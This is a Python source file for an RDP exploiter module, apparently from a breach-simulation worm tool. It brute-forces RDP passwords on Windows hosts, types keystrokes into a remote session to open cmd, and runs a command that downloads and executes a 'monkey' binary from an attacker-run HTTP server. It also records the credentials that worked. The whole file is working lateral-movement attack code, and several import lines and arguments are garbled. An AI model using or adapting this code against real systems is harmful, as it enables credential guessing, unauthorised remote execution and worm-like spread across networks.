import time import threading import os.path import twisted.python.log import rdpy.core.log as rdpy_log from rdpy.protocol.rdp import rdp from twisted.internet import reactor from rdpy.core.error import RDPSecurityNegoFail from logging import getLogger from exploit import HostExploiter from import HTTPTools from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS from import VictimHost from import check_port_tcp from import get_target_monkey __author__ = 'hoffer' KEYS_INTERVAL = 0.1 MAX_WAIT_FOR_UPDATE = 120 KEYS_SENDER_SLEEP = 0.01 DOWNLOAD_TIMEOUT = 60 RDP_PORT = 3389 LOG = getLogger(__name__) def twisted_log_func(*message, **kw): if kw.has_key('isError') and kw['isError']: error_msg = 'Unknown' if kw.has_key('failure'): error_msg = kw['failure'].getErrorMessage() LOG.error("Error from twisted library: %s" % (error_msg,)) else: LOG.debug("Message from twisted library: %s" % (str(message),)) def rdpy_log_func(message): LOG.debug("Message from rdpy library: %s" % (message,)) twisted.python.log.msg = twisted_log_func rdpy_log._LOG_LEVEL = rdpy_log.Level.ERROR rdpy_log.log = rdpy_log_func # thread for twisted reactor, create once. global g_reactor g_reactor = threading.Thread(, args=(False,)) class ScanCodeEvent(object): def __init__(self, code, is_pressed=False, is_special=False): self.code = code self.is_pressed = is_pressed self.is_special = is_special class CharEvent(object): def __init__(self, char, is_pressed=False): self.char = char self.is_pressed = is_pressed class SleepEvent(object): def __init__(self, interval): self.interval= interval class WaitUpdateEvent(object): def __init__(self, updates=1): self.updates = updates pass def str_to_keys(orig_str): result = [] for c in orig_str: result.append(CharEvent(c,True)) result.append(CharEvent(c,False)) result.append(WaitUpdateEvent()) return result class KeyPressRDPClient(rdp.RDPClientObserver): def __init__(self, controller, keys, width, height, addr): super(KeyPressRDPClient, self).__init__(controller) self._keys = keys self._addr = addr self._update_lock = threading.Lock() self._wait_update = False self._keys_thread = threading.Thread(target=self._keysSender) self._keys_thread.daemon = True self._width = width self._height = height self._last_update = 0 self.closed = False self.success = False self._wait_for_update = None def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data): update_time = time.time() self._update_lock.acquire() self._last_update = update_time self._wait_for_update = False self._update_lock.release() def _keysSender(self): while True: if self.closed: return if len(self._keys) == 0: reactor.callFromThread(self._controller.close) LOG.debug("Closing RDP connection to %s:%s",, self._addr.port) return key = self._keys[0] self._update_lock.acquire() time_diff = time.time() - self._last_update if type(key) is WaitUpdateEvent: self._wait_for_update = True self._update_lock.release() key.updates -= 1 if key.updates == 0: self._keys = self._keys[1:] elif time_diff > KEYS_INTERVAL and (not self._wait_for_update or time_diff > MAX_WAIT_FOR_UPDATE): self._wait_for_update = False self._update_lock.release() if type(key) is ScanCodeEvent: reactor.callFromThread(self._controller.sendKeyEventScancode, key.code, key.is_pressed, key.is_special) elif type(key) is CharEvent: reactor.callFromThread(self._controller.sendKeyEventUnicode, ord(key.char), key.is_pressed) elif type(key) is SleepEvent: time.sleep(key.interval) self._keys = self._keys[1:] else: self._update_lock.release() time.sleep(KEYS_SENDER_SLEEP) def onReady(self): pass def onClose(self): self.success = len(self._keys) == 0 self.closed = True def onSessionReady(self): self._last_update = time.time() self._keys_thread.start() class CMDClientFactory(rdp.ClientFactory): def __init__(self, username, password="", domain="", command="", optimized=False, width=666, height=359): self._username = username self._password = password self._domain = domain self._keyboard_layout = "en" # key sequence: WINKEY+R,cmd /v,Enter,&exit,Enter self._keys = [SleepEvent(1), ScanCodeEvent(91,True,True), ScanCodeEvent(19,True), ScanCodeEvent(19,False), ScanCodeEvent(91,False,True), WaitUpdateEvent()] + str_to_keys("cmd /v") + [WaitUpdateEvent(), ScanCodeEvent(28,True), ScanCodeEvent(28,False), WaitUpdateEvent()] + str_to_keys(command+"&exit") + [WaitUpdateEvent(), ScanCodeEvent(28,True), ScanCodeEvent(28,False), WaitUpdateEvent()] self._optimized = optimized self._security = rdp.SecurityLevel.RDP_LEVEL_NLA self._nego = True self._client = None self._width = width self._height = height self.done_event = threading.Event() self.success = False def buildObserver(self, controller, addr): """ @summary: Build RFB observer We use a RDPClient as RDP observer @param controller: build factory and needed by observer @param addr: destination address @return: RDPClientQt """ # create client observer self._client = KeyPressRDPClient(controller, self._keys, self._width, self._height, addr) controller.setUsername(self._username) controller.setPassword(self._password) controller.setDomain(self._domain) controller.setKeyboardLayout(self._keyboard_layout) controller.setHostname( if self._optimized: controller.setPerformanceSession() controller.setSecurityLevel(self._security) return self._client def clientConnectionLost(self, connector, reason): # try reconnect with basic RDP security if reason.type == RDPSecurityNegoFail and self._nego: LOG.debug("RDP Security negotiate failed on %s:%s, starting retry with basic security" % (, connector.port)) # stop nego self._nego = False self._security = rdp.SecurityLevel.RDP_LEVEL_RDP connector.connect() return LOG.debug("RDP connection to %s:%s closed" % (, connector.port)) self.success = self._client.success self.done_event.set() def clientConnectionFailed(self, connector, reason): LOG.debug("RDP connection to %s:%s failed, with error: %s" % (, connector.port, reason.getErrorMessage())) self.success = False self.done_event.set() class RdpExploiter(HostExploiter): _target_os_type = ['windows'] def __init__(self): self._config = __import__('config').WormConfiguration def is_os_supported(self, host): if host.os.get('type') in self._target_os_type: return True if not host.os.get('type'): is_open,_ = check_port_tcp(host.ip_addr, RDP_PORT) if is_open: host.os['type'] = 'windows' return True return False def exploit_host(self, host, src_path=None): global g_reactor assert isinstance(host, VictimHost) is_open, _ = check_port_tcp(host.ip_addr, RDP_PORT) if not is_open:"RDP port is closed on %r, skipping", host) return False src_path = src_path or get_target_monkey(host) if not src_path:"Can't find suitable monkey executable for host %r", host) return False # create server for http download. http_path, http_thread = HTTPTools.create_transfer(host, src_path) if not http_path: LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.") return False if self._config.rdp_use_vbs_download: command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path} else: command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path} passwords = list(self._config.psexec_passwords[:]) known_password = host.get_credentials(self._config.psexec_user) if known_password is not None: if known_password in passwords: passwords.remove(known_password) passwords.insert(0, known_password) if not g_reactor.is_alive(): g_reactor.daemon = True g_reactor.start() exploited = False for password in passwords: try: # run command using rdp."Trying rdp logging into victim %r with user %s and password '%s'", host, self._config.psexec_user, password) client_factory = CMDClientFactory(self._config.psexec_user, password, "", command) reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory) client_factory.done_event.wait() if client_factory.success: exploited = True host.learn_credentials(self._config.psexec_user, password) break except Exception, exc: LOG.debug("Error logging into victim %r with user" " %s and password '%s': (%s)", host, self._config.psexec_user, password, exc) continue http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() if not exploited: LOG.debug("Exploiter RdpGrinder failed, rdp failed.") return False elif http_thread.downloads == 0: LOG.debug("Exploiter RdpGrinder failed, http download failed.") return False"Executed monkey '%s' on remote victim %r", os.path.basename(src_path), host) return True